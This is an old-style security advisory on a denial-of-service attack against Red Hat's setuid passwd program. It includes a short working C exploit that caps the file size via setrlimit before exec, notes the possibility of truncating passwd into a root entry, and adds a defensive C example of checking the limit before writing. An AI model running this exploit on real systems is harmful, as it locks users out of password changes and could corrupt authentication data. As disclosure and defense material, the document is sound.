COMMAND

    passwd

SYSTEMS AFFECTED

    RedHat Linux (at least)

PROBLEM

    Antonomasia found the following.  This demonstrates a resource
    starvation attack on the setuid root passwd(1) program.  In the
    case he tested it was the Red Hat Linux passwd-0.50-7 program
    without shadowing.

    The resource being restricted is filesize, and if the passwd  file
    is large enough it cannot  be written back and the  passwd program
    dies.  This leaves the passwd file locked against further password
    changes - a denial of  service attack.  Antonomasia was  unable to
    write back an incomplete passwd file during his tests, but you can
    imagine some systems  allowing this, in  which case you  could aim
    for an incomplete last line like this:

        myname:my-epw:

    which could be awkward if any authentication programs interpret it
    as:

        myname:my-epw:0:0::/:/bin/sh

    Exploit follows:

        #include <stdio.h>
        #include <sys/time.h>
        #include <stdlib.h>
        #include <unistd.h>
        #include <sys/resource.h>

        int main(void)
        {
            struct rlimit rl;

            /* Cap the file size this process may write; the limit is
             * inherited across exec by the passwd program below. */
            rl.rlim_cur = 4000;
            rl.rlim_max = 4000;
            if (setrlimit(RLIMIT_FSIZE, &rl) != 0) {
                perror("setrlimit");
                return 1;
            }
            execl("/usr/bin/passwd", "passwd", (char *) 0);
            perror("execl");   /* only reached if the exec fails */
            return 1;
        }

SOLUTION

    A suggested fix is for the passwd program to be aware of the  size
    of the file before writing,  and to quit if failure  is predicted.
    There are obviously other resources that could be restricted,  and
    there may  be a  case for  increasing limits  on cpu  time or file
    descriptors, or even filesize to ensure successful completion.
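    The check the SOLUTION describes, written out as an added example in C
    (not code from the advisory or from the Red Hat passwd program): before
    rewriting the file, compare its projected size against RLIMIT_FSIZE,
    raise the soft limit to the hard limit when that is enough, and quit
    without touching the file when the hard limit cannot be raised.  The
    function names, the sample passwd contents and the /tmp scratch path are
    assumptions made for the example; simulate_fsize_restriction() only
    reproduces the advisory's limit so the refusal path can be exercised.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/resource.h>

/* Constructed sample of the data a password-file rewrite would produce;
 * not real account data. */
static const char sample_passwd[] =
    "root:x:0:0:root:/root:/bin/sh\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/sh\n";

/* Reproduce the advisory's restriction for testing: set both the soft and
 * hard RLIMIT_FSIZE, which a child program then inherits across exec.
 * An unprivileged process cannot raise the hard limit again. */
int simulate_fsize_restriction(rlim_t bytes)
{
    struct rlimit rl = { bytes, bytes };
    return setrlimit(RLIMIT_FSIZE, &rl);
}

/* Lower only the soft limit, leaving the hard limit so it can be raised. */
int restrict_soft_fsize(rlim_t bytes)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_FSIZE, &rl) != 0)
        return -1;
    rl.rlim_cur = bytes;
    return setrlimit(RLIMIT_FSIZE, &rl);
}

/* Return 1 if a file of `needed` bytes can be written under RLIMIT_FSIZE,
 * raising the soft limit up to the hard limit when that suffices; return 0
 * when the hard limit makes the write impossible, so the caller can refuse
 * before touching (and locking) the file. */
int fsize_limit_allows(rlim_t needed)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_FSIZE, &rl) != 0)
        return 0;
    if (rl.rlim_cur == RLIM_INFINITY || rl.rlim_cur >= needed)
        return 1;
    if (rl.rlim_max != RLIM_INFINITY && rl.rlim_max < needed)
        return 0;
    rl.rlim_cur = rl.rlim_max;   /* RLIM_INFINITY or a value >= needed */
    return setrlimit(RLIMIT_FSIZE, &rl) == 0;
}

/* Write `len` bytes to `path` only after the limit check passes.  A write
 * that exceeds RLIMIT_FSIZE would otherwise deliver SIGXFSZ and kill the
 * process mid-update, which is how the advisory's passwd binary died.
 * Returns 0 on success, -1 with errno EFBIG if refused, -1 on I/O error. */
int write_if_limit_allows(const char *path, const char *data, size_t len)
{
    if (!fsize_limit_allows((rlim_t)len)) {
        errno = EFBIG;
        return -1;
    }
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, len);
    int saved = errno;
    close(fd);
    errno = saved;
    return (n >= 0 && (size_t)n == len) ? 0 : -1;
}

/* Write the constructed sample to a scratch file and clean up.
 * Returns 0 if the guarded write succeeded, -1 if refused or failed. */
int demo_write_sample(void)
{
    char path[] = "/tmp/passwd-guard-XXXXXX";   /* assumed scratch location */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    close(fd);
    int rc = write_if_limit_allows(path, sample_passwd, strlen(sample_passwd));
    unlink(path);
    return rc;
}

int main(void)
{
    restrict_soft_fsize(16);               /* soft limit far below the file */
    if (demo_write_sample() == 0)
        puts("soft limit raised, sample written");
    else
        perror("write refused");

    simulate_fsize_restriction(16);        /* hard limit: cannot be raised */
    if (demo_write_sample() == 0)
        puts("unexpectedly written");
    else
        perror("write refused before touching the file");
    return 0;
}
```

    The order matters: the limit is checked before the file is opened for
    writing, so a refusal leaves the existing file intact and unlocked
    instead of a truncated or half-written one.  Raising the soft limit
    covers the "increase limits to ensure completion" suggestion; only the
    hard limit, which the exploit above also lowers, forces the program to
    give up.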